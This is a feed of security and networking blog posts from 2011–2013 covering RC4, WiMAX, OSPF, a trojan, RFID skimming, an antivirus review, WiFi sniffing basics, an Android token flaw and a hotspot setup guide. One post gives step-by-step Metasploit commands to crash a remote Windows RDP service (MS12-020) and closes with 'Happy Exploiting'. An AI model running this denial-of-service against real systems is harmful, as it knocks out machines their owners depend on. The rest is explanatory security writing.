TechKranti

Vulnerability in RC4 stream cipher can get your Gmail, Facebook or Paypal hacked

noreply@blogger.com (Amey Anekar) — Sat, 16 Mar 2013 08:57:00 +0000

Security researchers at Royal Holloway, University of London and University of Illinois at Chicago have discovered a vulnerability in RC4 stream cipher. RC4 is both simple and quick and is used by major corporations like Google, Facebook, PayPal, etc. to encrypt and transfer your information when you connect to these sites over HTTPS. Attack developed by these researchers can extract original information hidden in the encrypted text on careful analysis.

How does this matter to you as a normal web user?
Post authentication, whichever link you click from within Gmail or Facebook or for that matter any site, sends with the request an authentication cookie, that is to verify that the request is coming from an authenticated user. So, when you are on SSL or TLS encryption (in simple terms, when your browser shows HTTPS), this cookie is sent to the server in an encrypted manner and cannot be misused even if some attacker manages to sniff your traffic. But, things might change after this development pertaining to the RC4 cipher. The protocol which is used to encrypt these cookies in transit is proven to be vulnerable. Hence, if an attacker manages to get a dump of your encrypted traffic, he may on careful inspection be able to extract the cleartext cookie that is hidden in the encrypted message.

So what happens if someone has your cookie?
If an authentication cookie falls in mischievous hands, it can be used to make the remote server believe that the request is actually originating from the person from whom the cookie was stolen. Sounds difficult? It is not. Cookie-stealing is a very old-school method of hacking user accounts. Then too, not much was done on the cookie implementation side, to make them more secure. Instead, these cookies were secured by mode of encryption.

Should you be afraid?
Not right now but beware. This is a relatively new vulnerability, and mass exploitation is not yet witnessed. This attack requires that the hacker should on the same network as you are such that he can sniff the traffic being sent over the network.

Which websites use RC4?

As per stats, 50% of Internet's HTTPS websites use RC4. The irony is that, this mass migration to RC4 had happened because of a vulnerability discovered in the Cipher-block Chaining (CBC) encryption algorithm in TLS. Well, I guess we will again get to see this mass migration from RC4 to an even stronger encryption protocol.

But RC4 itself has been infamous for its vulnerable nature. RC4 was developed in 1987 (quite old), and was used in WEP (Wired Equivalent Privacy) protocol for authentication and encryption. Its been long that we have given WEP the RIP status, but RC4 is continually being used by big names on the Internet.

Wi-Max !!!

noreply@blogger.com (Rohan Patil) — Sat, 09 Mar 2013 07:46:00 +0000

WiMAX (Worldwide Inter-operability for Microwave Access) is a wireless digital communications system, also known as IEEE 802.16, that is intended for wireless "metropolitan area networks". WiMAX can provide broadband wireless access (BWA) up to 30 miles (50 km) for fixed stations, and 3 - 10 miles (5 - 15 km) for mobile stations ( WiFi/802.11 is limited 100 - 300 feet).

The name "WiMAX" was given by the WiMAX Forum, which was formed in June 2001 to promote conformity and interoperability of the standard. WiMAX operates on both licensed and non-licensed frequencies. WiMAX supports WiFi-like data rates, but the issue of interference is lessened. WiMAX is a second-generation protocol that allows for more efficient bandwidth use, interference avoidance, and is intended to allow higher data rates over longer distances.

Fixed WiMAX
WiMAX provides fixed, portable or mobile non-line-of sight service from a base station to a subscriber station, also known as customer premise equipment (CPE). Some goals for WiMAX include a radius of service coverage of 6 miles from a WiMAX base station for point-to-multipoint, non-line-of-sight service. This service should deliver approximately 40 Mbps for fixed and portable access applications. That WiMAX cell site should offer enough bandwidth to support hundreds of businesses with T1 speeds and thousands of residential customers with the equivalent of DSL services from one base station.

Mobile WiMAX
Mobile WiMAX takes the fixed wireless application a step further and enables cell phone-like applications on a much larger scale. For example, mobile WiMAX enables streaming video to be broadcast from a speeding police or other emergency vehicle at over 70 MPH. It potentially replaces cell phones and mobile data offerings from cell phone operators such as EvDo, EvDv and HSDPA.

A WiMAX tower, similar in concept to a cell-phone tower - A single WiMAX tower can provide coverage to a very large area -- as big as 3,000 square miles (~8,000 square km).A WiMAX tower station can connect directly to the Internet using a high-bandwidth, wired connection (for example, a T3 line). It can also connect to another WiMAX tower using a line-of-sight, microwave link. This connection to a second tower (often referred to as a backhaul), along with the ability of a single tower to cover up to 3,000 square miles, is what allows WiMAX to provide coverage to remote rural areas.

A WiMAX receiver - The receiver and antenna could be a small box or PCMCIA card, or they could be built into a laptop the way WiFi access is today.

It provides two types of wireles services:

There is the non-line-of-sight, WiFi sort of service, where a small antenna on your computer connects to the tower. In this mode, WiMAX uses a lower frequency range -- 2 GHz to 11 GHz (similar to WiFi).

There is line-of-sight service, where a fixed dish antenna points straight at the WiMAX tower from a rooftop or pole. The line-of-sight connection is stronger and more stable, so it's able to send a lot of data with fewer errors. Line-of-sight transmissions use higher frequencies, with ranges reaching a possible 66 GHz. At higher frequencies, there is less interference and lots more bandwidth.

Why Area 0 in OSPF is a Backbone network?

noreply@blogger.com (Rohan Patil) — Mon, 18 Feb 2013 14:13:00 +0000

In OSPF, if there are more than 1 areas have to be configured always make area 0 as a backbone network, because while designing networks it is a best practice to start with area 0 and then expand it into other areas.

The basic concept behind this idea is that all areas are physically connected to area 0 and area 0 resides at the center of all other areas. Whatever routing information is generated is transferred into area 0 by other areas and then area0 spreads that information into other areas.

If we are unable to connect any area physically to area 0 (which is mandatory) we need to configure a Virtual Link between that area and area 0 provided they both should have a common area which is physically connected to both the areas.

Ex: consider there are 3 areas in ospf( area 0, area 1 and area 2). area 0 and area 1 are physically connected to each other and area 2 is physically connected to area 1 but unable to connect to area 0 in this situation we can configure a Virtual Link betweeen area 0 and area 2.

But virtual link is completely depend upon physical link, so if physical link fails then virtual link also fails.

Why UDP is connectionless?

noreply@blogger.com (Rohan Patil) — Mon, 18 Feb 2013 13:48:00 +0000

1) TCP is reliable because it provides Acknowledgement. It establishes connection and sends packets in their arriving order.

2)UDP is unreliable because it doesn't provide Acknowledgement. Packets are sent over network without their arriving order, but data gram can be sent to many destinations at the same time.

It is connectionless because it doesn't establish connection and it is fast.

Black Hole in Networking

noreply@blogger.com (Rohan Patil) — Mon, 18 Feb 2013 13:27:00 +0000

        BLACK HOLE is a term used for Router that goes gown (offline) and it is undetected by other routers in network.
        Packets forwarded to router get dropped and never arrive at destination.
        They are unable to generate destination unreachable message, so users are unaware of data lost.

TechKranti crosses 1 million mark

noreply@blogger.com (Amey Anekar) — Wed, 13 Feb 2013 06:49:00 +0000

TechKranti has crossed the 1 million mark on Alexa. Click here.

Next target is to be among the top 100,000.

Thank you All.

Spachanel Trojan uses SPF to evade anti-virus

noreply@blogger.com (Rahul Sachin Amey) — Wed, 30 Jan 2013 06:26:00 +0000

Operating systems now-a-days are making it more and more difficult for malware writers to find exploitable vulnerabilities. But, hackers is a breed which is ever ready to take on difficult challenges.

A recent trojan known as Spachanel uses SPF (Sender Policy Framework) protocol, designed to avoid email spoofing, to its advantage. SPF is a DNS-based protocol designed primarily for getting rid of the menace of email spoofing. SPF involves creation of an additional DNS entry which can be of the type TXT. To understand how the trojan uses SPF for its benefit, let us first understand how SPF works.

Assume an email being sent from alice@send.com to bob@recv.com.

When the email is received at the spam filtering device or the mail transfer agent, which ever is configured to check for SPF, the system checks the email sender's domain name. Then it makes a DNS query to the sending domain (in our case send.com) for a TXT record. This record defines the IP addresses or hostnames of valid email servers for send.com. Below is a sample TXT query for send.com. Now, the system will check the IP address or hostname mentioned in the SPF record against the IP address of the sending mail server. If both match, then we can assure that email has originated from a legitimate email account from the send.com domain. If there is a mismatch, we can assure that someone is trying to spoof the email to make it appear to have come from alice@send.com.

Now, how is Spachanel using this to its benefit. Spachanel is programmed to send user information from the machine it has infected. Anti-virus software learn such signature activities carried out by a malware. Once, it is learned as to what IP address or domain name the malware is connecting to, AV companies will include it as a signature in its database. Any attempt to send information to the identified IP address or domain name will be flagged and the infection will be cleaned. So, how does Spachanel evade it. Here's how. Spachanel is configured to change the domain name which it will be communicating with after some days. Spachanel creators communicate this change in domain name through the SPF record of the earlier domain name. So, till the SPF record of the current domain name matches the domain name itself, the malware will continue sending information to the same domain. Once it observes a change in the domain name, it will start sending information to the newly received domain.

What does Spachanel steal from the infected machine?
On the infected machine, Spachanel embeds itself in browser's processes like chrome.exe, iexpolre.exe, firefox.exe to popup ads which when clicked generate revenue for the malware creators. It has not been reported of stealing any confidential information from the infected machine. But, it is better to clean the machine as soon as you suspect an infection.

Credit Card RFID Skimming: The saga continues...

noreply@blogger.com (Rahul Sachin Amey) — Sun, 27 Jan 2013 09:10:00 +0000

Credit cards have been one of the most lucrative targets for fraudsters. As per the U.S. Department of Justice, about 10% Americans have been subject to victims of credit card fraud. Worldwide the total amount subject to credit card fraud is $ 5.5 billion.

The most covert form of credit card frauds is card skimming. Skimming involves capturing credit card information using terminals which are similar to PoS terminals where a merchant swipes a card for making payments. The captured information is then used by the criminals to create clones of your credit cards. All this happens behind the scene. The victim does not realize that he is subjected to fraud until he receives the notification SMS when the purchase is made, or even worse if he is not registered for alerts, when he receives his monthly statement. To thwart these types of skimming attacks, Europay, MasterCard and Visa joined hands to develop the EMV standard. The EMV implementation too has been proved to be vulnerable to attacks. [Ref]

Lately, with the boom of the radio frequency industry, RFID enabled cards have seen majority of payment brands enticing their customers to RFID enabled cards. But, there has been an ever-existing vulnerability with RFID. The threat to RFIDs is that RFID readers can be used to read the information transmitted by the RFID emitters. The following Youtube video demonstrates the vulnerability of RFID cards:

Google challenges the sheer existence of passwords

noreply@blogger.com (Rahul Sachin Amey) — Sun, 20 Jan 2013 07:45:00 +0000

When computers were invented, people depended on their obscurity for their security. People had little knowledge on how to use computers, let alone exploiting them. But as the line between obscurity and security thinned, passwords were invented. Now that a lot of people were becoming computer literate , it was easier for a not-so-genius to exploit open systems on the internet with very little knowledge about the system. Authentication became important. Users were authenticated on the basis of 'something they know' called the password. But passwords have had a very bad history. From social engineering to password cracking, passwords have been the prime motive of attacks and these breaches have cost organizations millions of dollars.

Now, Google, which is known for its path-breaking way of looking at things, is challenging the very existence of passwords as a mode of authentication. Google is considering a hardware-authentication solution to the password problem.

Security researchers from Google, Eric Grosse and Mayank Upadhyay, have published a research paper, "Authentication at Scale", for use of USB key ring to authenticate users to the cloud. Focus of EG and MU's paper has been surrounded around securing the future of cloud computing. I say to secure the future because some big names have invested a fortune betting it big on cloud computing and 'Security' is what is refraining people from large scale adoption of cloud computing, 'Authentication' is not the only concern though. This study by Google researchers is a step forward into the world of cloud computing. I remember attending AWS conference in Mumbai where everyone was discussing about the possible benefits that cloud computing would provide where one notorious chap introduced the discussion of 'Security in the Cloud'. That's when AWS officials looked really pissed off. But that is the sad fact, 'Seciruty in the cloud' is too much hyped.

To gain customer confidence it is important to use technologies that have not been broken earlier. If you are going to use the same old firewall to secure the network on the cloud, I am going to be skeptic about putting my data up there. Innovative thinking, like the one displayed by Grosse and Upadhyay, is required to boost the business of cloud computing.

How to exploit MS12-020 (CVE-2012-0002) RDP vulnerability using Metasploit?

noreply@blogger.com (Rahul Sachin Amey) — Sun, 15 Apr 2012 07:48:00 +0000

CVE-2012-0002 is an internally reported vulnerability in Microsoft's Remote Desktop Application. Patch for this vulnerability was released on March 13, 2012 as MS12-020. This vulnerability can cause a full system compromise. Failed attempts to exploit this vulnerability can cause a DoS for RDP.

Metasploit has working exploit for DoS for this vulnerability. The remote system should be running terminal services service for this exploit to work. Here's how it goes:

1. Start msfconsole

2. Give the command - use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

3. Then set the IP address of the remote system giving the command - set RHOST <IP>

4. Then give the command - 'run' to execute the exploit on the remote system

I tried it on a local VM and the VM showed a BSOD.

Happy Exploiting!!!

Norton Internet Security 2012: More than a Review

noreply@blogger.com (Rahul Sachin Amey) — Wed, 14 Dec 2011 18:00:00 +0000

What is it that thing that reminds you, that you have an Anti-virus installed on your system? Is it the alerts? Naa. You can actually go without being exposed to malware for quite a number of weeks. I think the thing that reminds you that is the constant performance degradation of your machine when it runs the scheduled scans on your system. If that is how you would define an Anti-virus, then my dear friends, I can irrefutably say that Norton Internet Security 2012 (NIS 2012) is not an anti-virus although it functions like one :).

Symantec with its latest addition NIS 2012 presents to you a new era of anti-virus software which won't eat up your processing power in return for securing your system. NIS really secures your system from all sorts of threats, may it be from the internet or from infected flash drives. I have been using NIS 2012 for about 3 months now and I should say that paying adieu to my old Kaspersky was a pretty good decision. Fun fact about Kaspersky: I had set a daily full scan at 12 pm and when I am at the peak of my work it would eat up all my memory which probably belongs to me :). Here I am gonna explain some really cool features that NIS 2012 offers without depleting your precious memory.

1. Download Insight:

The most innovative feature that comes with NIS 2012 is Download insight(DI). It takes care that the file you just downloaded from the Internet is safe from any malware. As soon as you download an executable on your system, NIS 2012 initiates DI to analyze the trustworthiness of the file and within seconds it pops up an alert giving an 'Insight' on the downloaded file.

This is a really cool way to save yourself from threats for which signatures have not yet been downloaded by your AV. This brings us to the concept of 'Cloud-based Scanning'. Cloud-based scanning is the new buzzword in the security industry and a few security vendors are using the term although they often mean something very different.

The obvious advantage of cloud scanning is that the turnaround time for a definition to be available is extremely fast – as soon as a definition is available in the cloud, it is available to the user. What Symantec has done is to build a system that analyzes the reputation of the new software and files across the Internet and then calculates a reputation score for each of them. This system receives feeds from tens of millions of customers that anonymously participate in the Norton Community Watch program. The technology automatically starts working on calculating the reputation score as it becomes aware of new files.

We got in touch with Mr. David Hall, Consumer Product Marketing, Asia Pacific for Syamtec for more clarity about Download Insight. Mr. David says, "Now this is powerful – we have a system that can receive knowledge of new files worldwide and use a Symantec “secret sauce” algorithm to calculate the reputation score automatically! This information is immediately available to Download Insight through the cloud, but quite a bit different than just moving the old signature model to the cloud."

But How is the reputation score of a file determined?

A reputation score is calculated using a complex algorithm based on various parameters. Remember, the main feed in to the Reputation system is the information received from the Norton Community Watch program.   Here’s a list of a few parameters that are used to calculate the reputation score: 

How many instances of a particular file are seen?
How long has that file been around? 
From which URLs were they downloaded? 
What is the basic health of the system that is submitting the data? 
Which software vendor does the file belong to?

Download Insight in action  :

Download Insight monitors when new files are downloaded, and once the download is complete it goes into action:

This is the flow where the user chooses to save the application to a folder on the computer.  

Download Insight observes that the file download from the Internet is complete. 
It calculates the SHA256 hash of that file and immediately asks the online servers for a reputation score. 
Based on the reputation score, Download Insight will:

Prevalence – How widely used is this file is in the Norton Community? It can range from very few instances to millions of machines.
Age – How long has this file been around?
Reputation Rating – What does Norton think of this file? It provides an indication on how trustworthy the file is. 
URL – This provides the website from which this file was downloaded.

Run the download file:

2. SONAR

SONAR provides real-time protection against threats and proactively detects unknown security risks on your computer and identifies emerging threats based on the behavior of applications. SONAR identifies threats quicker than the traditional signature-based threat detection techniques. SONAR detects and protects you against malicious code even before virus definitions and monitors your computer for malicious activities through heuristic detections. In fact, improved SONAR technology in the Norton 2012 products monitors running applications for suspicious behavior to quickly detect and disable previously unknown threats.

Some significant changes were made to SONAR when Symantec launched the Norton 2011 products last year, which included the latest SONAR 3 that built upon the successful, effective and efficient SONAR 2 behavioral security engine. With SONAR 2, Symantec has a proven track record of being able to convict malware and secure Norton users from malware designed to evade most other security features. According to Symantec, "In nine months we prevented upward of 4.2 million infections out of about 140 million incidents that we analyzed for Norton users. Most of these incidents were never-before-seen malware and infection scenarios, thus truly providing "zero-day" protection! The effectiveness of our technology was repeatedly confirmed by external 3rd-party tests and reviews (specifically behavioral security tests and reviews), where we performed at or near 100% detection rates."

Behavioral security is a critical security solution, especially in this era of server-side polymorphic malware where each and every infection can have a unique piece of malware file (unique from the file fingerprint perspective) downloaded on the victim's machine.

SONAR aggregates and correlates information from a number of engines within the product like the Firewall, AV Engine, Intrusion Prevention Engine, etc. All this information is then used by the classifier to improve efficacy and this is a big differentiator for Norton. Most other security products simply don’t have this depth and breadth of information to make a good classifier. In SONAR 3 we have further enhanced our integration with the network component in order to classify, convict, and remediate malware on the basis of its malicious network activity. With this feature in place, we will continue to block and remove many new variants of malware that leave their network footprint unchanged.

3. How does NIS 2012 assure Security without compromising Performance?

NIS 2012 performs quick scans only when the system is in idle mode. So your system would be scanned only when you are away from it. We asked Symantec, "How does NIS select areas for performing quick scans?". Symantec's reply: "Norton will use idle time to scan against a list of files most commonly at risk. This varies dependant on the actual level of trust on the PC and other variables."

But quick scans are not enough to completely secure your system. NIS 2012 is scheduled to perform full system scans weekly. The Full scans too are so silent that you'll hardly notice them. You can see the logs of Full Scans by visiting the Security History

4. Intrusion Prevention

The intrusion prevention capabilities of NIS 2012 are good. It identifies all kinds of network-level attacks. I tried running a Nessus Scan against a virtual host where NIS was installed and the scan did not return any helpful results.

5. Some more miscellaneous yet useful features:

i. Performance Monitoring NIS 2012 provides performance alerts if an application is eating a big chunk of your memory.

ii. Safe Search
This has been a prevalent feature in many modern day anti-viruses. NIS 2012 also ships with IE, Firefox and Chrome plugins for verifying the health of locations of links from a search page. Image below is self-explanatory.

iii. Browser Protection
If NIS 2012 detects malicious content on an HTML page trying to exploit a vulnerability on your browser (especially when you are using IE ;)), it immediately discontinues the connection and pops up a malicious site banner.

iv. Identity Safe
Identity Safe is a password management plugin for your browser where you can set a master password and save all your logins for saving from the nuisance of typing your credentials at every authentication page you visit.

6. Graphical User Interface
The interface provided with NIS 2012 is very intuitive and easy to use. Highlighting some key aspects you can do using the GUI..

The huge world map there shows you the worldwide cybercrime activity for the past 24 hours. Also provides latest viruses that have been discovered and a link that will provide more information on the same.

If you dig deeper into the Advanced tab, you get to see your recent History of threats and ratings of applications installed on your system

7. Minds its own Business
Me being in the security field have to deal with a lot of tools which any Anti-Virus will report as a threat. But it is my choice to use them for my research. So when I tell NIS 2012, not to touch a certain location, it obeys like a very faithful companion, also reminding me about the risks I am exposed to by making this exclusion.

Moral:
NIS 2012 is a product made for all... From the Noob to the Geek... It kinda protects you at every step of your online life.

Lets take a scenario:
Suppose I am the dumbest person on this planet, the biggest n00b ever born. I have NIS 2012 installed. Let's see how NIS 2012 protects me from any possible malware:

1. I open my browser, google for "Some random executable". NIS 2012 tells me which search results are good and which are malicious.

2. I visit some random website and download a the file. NIS 2012 initiates Download Insight and checks the trustworthiness of the file.

3. I execute the downloaded file. NIS 2012 initiates its scanning engine to check for any viruses on the file.

4. The file has been executed. NIS 2012's SONAR functionality will check the application activity for any suspicious actions.

So NIS 2012 has made sure that my PC is secure at every phase of my online and offline activity. So, effectively, along with it being a good Anti-virus, it is also Stupidity-proof ;).

On an ending note: Auditing servers is a part of my job. I see a lot companies using cheap Anti-viruses which provide no real value add to the security infrastructure. It would be my humble recommendation to all those admins out there to use NIS 2012 as their AV (If you really wanna keep your data secure. If you just want to show compliance, use Any.. doesn't matter)

If you want to make a choice on buying an AV... I don't see any other than wise decision than Norton Internet Security 2012.

Key Logger for Android

noreply@blogger.com (Rahul Sachin Amey) — Sun, 21 Aug 2011 06:40:00 +0000

Computer scientists from UC Davis university have developed an Android app named TouchLogger that logs keystrokes using a smartphone's sensors to measure the locations a user taps on the touch screen.

Researchers have demonstrated that it is possible to log individual keystrokes entered on a smartphone's on-screen keyboard using device's built-in accelerometer (also known as the gyroscope). The researches were able to correlate the movements of the phone with individual keystrokes on an all-numeric keypad with an accuracy of about 70%. With minor refinements, the researchers believe they can expand the effectiveness of TouchLogger.

Applications like these can be potentially dangerous as an application does not require special privileges to access the device's accelerometer. Major smartphones, like Apple's iPhone, RIM's Blackberry, etc. give a user the freedom to define special permissions for applications to define their level of access. Usually within these permissions not much importance is given to those pertaining to the device's movements.

The developers of TouchLogger created this application for a PoC to be presented at HotSec'11, San Francisco. Presentation video available here (mp4) and the paper can be downloaded from here. A preliminary evaluation of the tool was done using HTC Evo 4G smartphone.

Following table shows the distribution of inference results which are evident for the app being correct 70% of the time.

The scientists noted that the W3C recently published a specification for web applications to access accelerometer and gyroscope sensors using JavaScript. They are in the process of extending their work into a full research project.

A less original, but rather more effective approach is taken by Android malware called GingerMaster. It uses a root exploit called GingerBreak to permanently compromise the smartphone. According to security researcher Xuxian Jiang, GingerMaster is the first piece of malware to deploy a root exploit for Android 2.3.3 "Gingerbread". It is concealed in repackaged legitimate apps and registers a receiver which will be
notified when the smartphone has finished booting. Once installed, it then launches a background service.

Subscribe to Techkranti feeds
To recieve updates on your mobile, Click here

WiFi Hacking Basics Part 3

noreply@blogger.com (Rahul Sachin Amey) — Fri, 20 May 2011 07:54:00 +0000

So in last post we learned the basic terminology,channels and frequencies of WLAN.
In this post we'll see about Beacon frames and authentication in Wifi.
Ther are two terms you should know about wifi.

ESSID-Name of connection

BSSID- MAC of AP

There are three important packets types we need to care about

Management packets:Used for connection management for ex assocation request,association resonse

Data packets:there is no need to explain data packets .

Control Packets: this packets are used for effective trasmission of data for ex. CTS,RTS

We are here concerned here with Management frames:

Authentication frame: 802.11 authentication is a process whereby the access point either accepts or rejects the identity of a radio NIC. The NIC begins the process by sending an authentication frame containing its identity to the access point. With open system authentication (the default), the radio NIC sends only one authentication frame, and the access point responds with an authentication frame as a response indicating acceptance (or rejection). With the optional shared key authentication, the radio NIC sends an initial authentication frame, and the access point responds with an authentication frame containing challenge text. The radio NIC must send an encrypted version of the challenge text (using its WEP key) in an authentication frame back to the access point. The access point ensures that the radio NIC has the correct WEP key (which is the basis for authentication) by seeing whether the challenge text recovered after decryption is the same that was sent previously. Based on the results of this comparison, the access point replies to the radio NIC with an authentication frame signifying the result of authentication.

Deauthentication frame: A station sends a deauthentication frame to another station if it wishes to terminate secure communications.
Association request frame: 802.11 association enables the access point to allocate resources for and synchronize with a radio NIC. A NIC begins the association process by sending an association request to an access point. This frame carries information about the NIC (e.g., supported data rates) and the SSID of the network it wishes to associate with. After receiving the association request, the access point considers associating with the NIC, and (if accepted) reserves memory space and establishes an association ID for the NIC.
Association response frame: An access point sends an association response frame containing an acceptance or rejection notice to the radio NIC requesting association. If the access point accepts the radio NIC, the frame includes information regarding the association, such as association ID and supported data rates. If the outcome of the association is positive, the radio NIC can utilize the access point to communicate with other NICs on the network and systems on the distribution (i.e., Ethernet) side of the access point.

Disassociation frame: A station sends a disassociation frame to another station if it wishes to terminate the association. For example, a radio NIC that is shut down gracefully can send a disassociation frame to alert the access point that the NIC is powering off. The access point can then relinquish memory allocations and remove the radio NIC from the association table.
Beacon frame: The access point periodically sends a beacon frame to announce its presence and relay information, such as timestamp, SSID, and other parameters regarding the access point to radio NICs that are within range. Radio NICs continually scan all 802.11 radio channels and listen to beacons as the basis for choosing which access point is best to associate with.
Probe request frame: A station sends a probe request frame when it needs to obtain information from another station. For example, a radio NIC would send a probe request to determine which access points are within range.
Probe response frame: A station will respond with a probe response frame, containing capability information, supported data rates, etc., when after it receives a probe request frame.

Ok lets move on to actual process.The time you switch on your wifi how does the card knoew if there's any network?
In WALAN environment with multiple AP's there are frames called Beacon frames.The beacon announces the network, not the individual access point. . If the network consists of just one access point, these are one and the same. Somewhat larger wireless networks will have more than one access point with the same SSID. The beacon offers insufficient information to differentiate between multiple AP's with the same SSID
I assume you have just one AP,still AP will use Beacon frames to broadcast presence of networks.
The client sends a null broadcast packet called 'Probe Request' to AP's in vicinity asking 'Send me connection you have'.Ap reply with Probe Response' client then send 'Authentication Request' to AP.AP respond with 'Auhentication Success'

There are two types of Authentication

Open Authentication
Shared Key Authentication

We'll see about this in more details in seperate post.After authentication,association phase start.Clent send 'Association Request'AP reply with 'Association Response'.

One important thing client store the SSID of networks in a list called PML to which it has connected in past.So whenever wifi is turned on client send Probe Request for these SSID specifically.After these phases atual data communication starts.If you want more info on any of these phases check IEEE 802.11 standard.

Vulnerability in Android has put 99% android handsets at Risk

noreply@blogger.com (Rahul Sachin Amey) — Wed, 18 May 2011 18:04:00 +0000

This risk pertains to using your Android to connect to Facebook, Twitter and some Google services over unencrypted wireless networks. The apps for this services communicate over clear text which can intercepted by an eavesdropper. Google services which are vulnerable to eavesdropping are Google Calendar and Google Contacts. The attack is possible to all Google services using the ClientLogin authentication protocol for access to its data APIs.

ClientLogin is meant to be used for authentication by installed applications and Android apps. Basically, to use ClientLogin, an application needs to request an authentication token (authToken) from the Google service by passing an account name and password via a https connection. The returned authToken can be used for any subsequent request to the service API and is valid for a maximum duration of 2 weeks. However, if this authToken is used in requests send over unencrypted http, an adversary can easily sniff the authToken (e.g. with Wireshark, see screenshot below). Because the authToken is not bound to any session or device specific information the adversary can subsequently use the captured authToken to access any personal data which is made available through the service API. For instance, the adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user. This means that the adversary can view, modify or delete any contacts, calendar events, or private pictures.

What can the attacker do?
The attack is similar to session stealing(Sidejacking). It is similar to what FireSheep had done.
The attacker can setup a rogue access point and get the victims to connect through his access point. The attacker can then attempt to impersonate the users and modify the information stored in their accounts.

Google has released a patch to solve the ClientLogin protocol problem, but the patch only works for Android 2.3.4 and Android 3.0, meaning that about 99 percent of Android phones don’t have access to the updated code !!!!
Courtesy: Ashish Kumar

WiFi Hacking Basics Part 2

noreply@blogger.com (Rahul Sachin Amey) — Wed, 18 May 2011 08:02:00 +0000

In last post we saw how to setup and capture traffic on moniter mode.Second part of the series is about wifi bands channels.
Noarmally Wifi operate in radio frequency range of 2.4Ghz.This 2.4 Ghz band is divided in channels like 1,2,3.... upto 14.Most important thing any wireless card can be on only one channel at a time because there is only one radio present in each card.
There are following 802.11 standards in Wireless LAN

802.11a : operating frequency 5Ghz
802.11b : operating frequency 2.4 Ghz
802.11g : operating frequency 2.4 Ghz
802.11n : operating frequency 2.4 Ghz

This are standard specified on AP and WLAN card.AP with 802.11a can support and create network of 802.11a and so on.WLAN card need hardware support to operate in different channels.

Source:Wikipedia
In table above you can see various channels along with frequencies.Countries apply their own regulations to both the allowable channels, allowed users and maximum power levels within these frequency ranges.

This was theory lets try some demo..
So how to put a WLAN card on a specific channel ?First verify the current status by command
#iwconfig wlan0
To put card on say channel 1 use following command..
#iwconfig wlan0 channel 1
Now you put card on channel 1 so wlan card can now sniff traffic on ch 1.Same can be done for 802.11 b/g band but you we need to use a tool Airodump-ng.So your card suport 802.11b/g and you want to toggle between these bands use following simple command
#airodump-ng --band {band }
for ex.#airodump-ng --band g
In next post we will cover some terminology of Wifi world and its meaning ..

'Enable Dislike Button' scam on Facebook

noreply@blogger.com (Rahul Sachin Amey) — Tue, 17 May 2011 18:58:00 +0000

Whenever I hated a status message or a shared link on Facebook, I said to myself - "I wish this thing had a dislike button to express my distress".. This must have come to your mind also, specially after disliking some video on Youtube. Well this urge of disliking posts on FB is what hackers are targetting next.. So beware!!! A quick overview of how the hackers get you to click on the link follows:

Following is a screenshot of how the message would be posted on your wall..

Pay close attention to the 'Enable Dislike Button' link besides the 'Comment' in place of the usual share link. The hackers have done so to fool users in believing it to be a Genuine feature added by FB. There is no official dislike button on FB.

Clicking on the link will cause same consequences whcih you might have experienced with the WTF video or Check who is visiting your profile link. The link will be posted on walls of random friends and the cycle will continue. It is believed that the link contains obfuscated javascript which is used by spamsters to study browsing behavior.

Another example relating to the Dislike Button:

This link tricks you into pasting a javascript to your browser. *Not at all recommended.

Repeating Again - "FB does not provide a Dislike feature"

How To Setup a Wi-Fi Hotspot

noreply@blogger.com (Rahul Sachin Amey) — Sun, 15 May 2011 17:20:00 +0000

Creating a Wi-Fi Internet hotspot service from scratch can seem like a daunting task. I had many sleepless nights trying to get to grips with FreeRadius, DD-WRT, Chillispot etc. I hope that this How To helps you to avoid some of the problems I encountered along the way.

********Warning ********

Following these instructions may invalidate your Linksys warranty. You do so at your own risk. These instructions assume that you have an understanding of Linux, PHP MySQL and Apache. If you brick your AP you might get it back by holding down the reset pin for 20 seconds, unplug the power while still holding down the reset button for another 20 seconds and then plugging the power back in while still keeping the reset button held in for a further 20 seconds. This should bring it back to the defaults of whatever firmware you have installed. You should be able to login to 192.168.1.1

*******End of Warning********

Feel free to copy or use this information in any way you like.

What you will need:-

a) DD-WRT
Download the latest version here http://dd-wrt.com

b) FreeRadius
Download the latest version here http://freeradius.org/

c) phpMyPrepaid
Download the latest version here http://sourceforge.net

d) Linsys WRT54GL AP

e) You will also need PHP, Apache, MySQL amd MySql Delopment Modules,(These need to be setup first.) some patience, plenty of coffee and cigarettes.

Step 1 : DD-WRT/Chillispot Configuration

Configure the WRT-54G with the standard Linksys software and the use the upgrade firmware module to install the dd-wrt package on the AP.
*******IMPORTANT******* Use your cable connection to do the upgrade. NOT the wireless connection.
Reboot the AP and login to your new firmare.
Set Dynamic configuration DHCP
Disable DHCP (Chillispot will manage DHCP for your clients.)
Change the Local IP of the AP to 192.168.10.1.
Set your gateway and DNS addresses.
Update changes and log back in to the new IP address.

Go to the administration page.
Enable Chillispot
Enter the IP address of your Radius server.
Enter the DNS.
Enter the redirect URL eg HTTPS://123.123.123.123/cgi-bin/hotspotlogin.cgi/ (MAke sure that the address ends in / and is https.)
Enter a shared key. (This can be anything you like, but keep a note of it you will need it later.)
Set DHCP Interface to Lan+Wlan
Enter a NAS id (Your name for your AP)
Enter a UAM secret (This is the password that Chilli will use to talk to hotspotlogin.cgi)
Save your settings and reboot the AP. Please give the AP about 10 minutes to reboot and initialise all the new services.

Step 2: FreeRadius Configuration.

Untar the FreeRadius tar file and enter its directory.
Type ./configure --with-experimental-modules
make
login as root and type make install
When this is finished copy the radiusd.conf file that you downloaded earlier to /usr/local/etc/raddb/
You should not need to edit radiusd.conf
Edit /usr/local/etc/raddb/sql.conf and in the SQL section make these changes.

# Database type
# Current supported are: rlm_sql_mysql, rlm_sql_postgresql,
# rlm_sql_iodbc, rlm_sql_oracle, rlm_sql_unixodbc, rlm_sql_freetds
driver = "rlm_sql_mysql"

# Connect info

server = "localhost"

login = "yourlogin"

password = "your password"

# Database table configuration
radius_db = "radius"

Edit the /usr/local/etc/raddb/clients.conf file and enter the details of your NAS (AP)

client xxx.xxx.xxx.xxx { (This is the address of your NAS or WRT54G )
secret = xxxxxxx (The secret you entered in the Chilli Config)
shortname = private-network-9 (This can be any name)
nastype = other
( If you want to set up several AP's with one secret the IP address above should be 0.0.0.0/0 )
}

Step 3 : hotspotlogin.cgi
Copy hotspotlogin.cgi from http://chillispot.org to /var/www/cgi-bin
Edit the file and change the secret to the UAM secret that you entered in the Chillispot configuration on the WRT54G.

ou can also use a php script. It is not as secure as the cgi script but easier to personalise. If you want a copy email me at sean@swarmhotspots.com

Step 4 : phpMyPrepaid and MySQL

